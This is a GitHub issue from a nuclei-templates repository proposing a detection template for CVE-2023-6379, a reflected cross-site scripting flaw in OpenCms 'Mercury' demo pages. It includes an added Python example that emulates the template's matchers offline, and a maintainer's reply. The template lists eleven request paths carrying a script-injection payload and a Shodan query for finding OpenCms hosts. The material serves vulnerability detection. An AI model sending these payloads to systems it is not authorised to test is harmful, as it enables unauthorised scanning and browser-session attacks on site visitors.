projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

CVE-2023-6379 #8882

Closed msegoviag closed 9 months ago

msegoviag commented 10 months ago

Template Information:

Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the Demo 'Mercury' template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session.

POC

[redacted]

References

Nuclei Template:


# id added: nuclei requires a template id, and the repository convention is the CVE identifier
id: CVE-2023-6379

info:
  name: OpenCms 14 & 15 - Cross-Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
  metadata:
    # one GET per path below; the original value of 2 did not match the 11 paths
    max-request: 11
    vendor: alkacon
    product: OpenCms
    shodan-query: title:"opencms"
  tags: cve,cve2023,opencms,xss,alkacon

http:
  - method: GET
    path:
      - '{{BaseURL}}/mercury-demo-de/tagebuch/eintraege/index.html?reloaded&page=1"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-json/demo-2/list-editor/index.html?reloaded&page=3"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/compact/index.html?reloaded&sort=date_desc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/elaborate/index.html?reloaded&sort=date_desc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/lists/masonry/index.html?reloaded&sort=date_asc&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/blog/articles/index.html?reloaded&page=2"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
      - '{{BaseURL}}/mercury-demo/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
      - '{{BaseURL}}/mercury-demo/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1"%3Czzz%3E%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    # every path proves the same finding, so stop once one of them reflects the payload
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          # reflected by the list/pagination endpoints, which carry the <zzz> canary
          - <zzz><script>alert(document.domain)</script>
          # reflected by the form endpoint, whose captcha_token_id payload has no <zzz> canary
          - '"><script>alert(document.domain)</script>'
        condition: or

      - type: word
        part: header
        words:
          - "Content-Type: text/html"

      - type: status
        status:
          - 200

Results

[redacted]
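As an added example, not code from the issue above or from the nuclei project, the following Python emulates how the template's three matchers combine (`matchers-condition: and` over a body word, a header word and a status) and runs that logic over constructed responses, so no OpenCms host is contacted. The `Response` class, the sample bodies and the `build_probe_path` helper are assumptions made for illustration; the point it shows is why an HTML-escaped echo, a raw echo inside a JSON response, and an echoing 404 page all fail to count as a finding, while only the unescaped reflection in a `text/html` 200 response does.

```python
# Added example: emulate the matcher logic of the CVE-2023-6379 nuclei template.
# Not the template's or nuclei's own code; responses below are constructed, not captured.
from dataclasses import dataclass
from html import escape
from urllib.parse import quote

# Payload string as the template expects it reflected, verbatim, in the response body.
CANARY = '<zzz><script>alert(document.domain)</script>'

# Mirrors the template's matchers. matchers-condition: and -> all three must hold.
BODY_WORDS = [CANARY]                       # type: word, part: body, condition: or
HEADER_WORDS = ["Content-Type: text/html"]  # type: word, part: header
STATUSES = {200}                            # type: status


@dataclass
class Response:
    """Minimal stand-in for an HTTP response (assumption for this example)."""
    status: int
    headers: dict
    body: str

    def raw_headers(self) -> str:
        # 'part: header' in nuclei is matched against the raw header block.
        return "\r\n".join(f"{k}: {v}" for k, v in self.headers.items())


def body_matches(resp: Response) -> bool:
    # word matchers are case-sensitive substring checks unless case-insensitive is set
    return any(w in resp.body for w in BODY_WORDS)


def header_matches(resp: Response) -> bool:
    return any(w in resp.raw_headers() for w in HEADER_WORDS)


def status_matches(resp: Response) -> bool:
    return resp.status in STATUSES


def template_matches(resp: Response) -> bool:
    """Combined verdict, equivalent to matchers-condition: and."""
    return body_matches(resp) and header_matches(resp) and status_matches(resp)


def build_probe_path(list_path: str, page: int) -> str:
    """Build one probe URL in the shape the template uses: a double quote closes the
    attribute the page value lands in, then the canary follows. The template leaves
    '"', '(' and ')' unencoded; here the whole value is percent-encoded so it survives
    any proxy or URL library unchanged. (Helper assumed for this example.)"""
    injected = f'{page}"{CANARY}'
    return f'{list_path}?reloaded&page={quote(injected, safe="")}'


# --- constructed sample responses (not from a real host) ---------------------------

def vulnerable_response() -> Response:
    # Unsanitized ?page= echoed into a pagination link: the quote closes href and the
    # rest of the value lands in HTML context, which is exactly what the body word needs.
    body = f'<a href="/lists/compact/index.html?page=2"{CANARY}">next</a>'
    return Response(200, {"Content-Type": "text/html;charset=UTF-8"}, body)


def patched_response() -> Response:
    # Same echo, but HTML-escaped: &lt;zzz&gt;... is inert and must not match.
    escaped = escape(f'2"{CANARY}')
    body = f'<a href="/lists/compact/index.html?page={escaped}">next</a>'
    return Response(200, {"Content-Type": "text/html;charset=UTF-8"}, body)


def json_echo_response() -> Response:
    # Raw reflection inside a JSON API response: the browser will not render it as
    # HTML, so the Content-Type gate keeps it from being reported.
    body = '{"page": "2\\"' + CANARY + '"}'
    return Response(200, {"Content-Type": "application/json"}, body)


def not_found_response() -> Response:
    # Some error pages echo the request; the status gate filters those out.
    body = f'<h1>Not found</h1><p>/lists/compact/index.html?page=2"{CANARY}</p>'
    return Response(404, {"Content-Type": "text/html"}, body)


if __name__ == "__main__":
    samples = [("vulnerable", vulnerable_response), ("patched", patched_response),
               ("json-echo", json_echo_response), ("not-found", not_found_response)]
    for name, make in samples:
        print(f"{name:10s} -> {'MATCH' if template_matches(make()) else 'no match'}")
    print(build_probe_path("/lists/compact/index.html", 2))
```

Run stand-alone it prints one verdict per sample and the fully percent-encoded probe path. Only the first sample matches; the other three each fail exactly one of the three gates, which is the behaviour the `and` condition in the template buys.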

princechaddha commented 10 months ago

Hi @msegoviag, thank you for taking the time to create this issue and for contributing to this project 🍻

I have updated the template and made a few changes, such as removing the demo directory. This is because the users are expected to provide the full path to the CMS, and it won't be hosted inside that directory on real targets. Thanks

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again

Note: Please refrain from sharing vulnerable environments on GitHub. You can do so via Discord DM for template validation.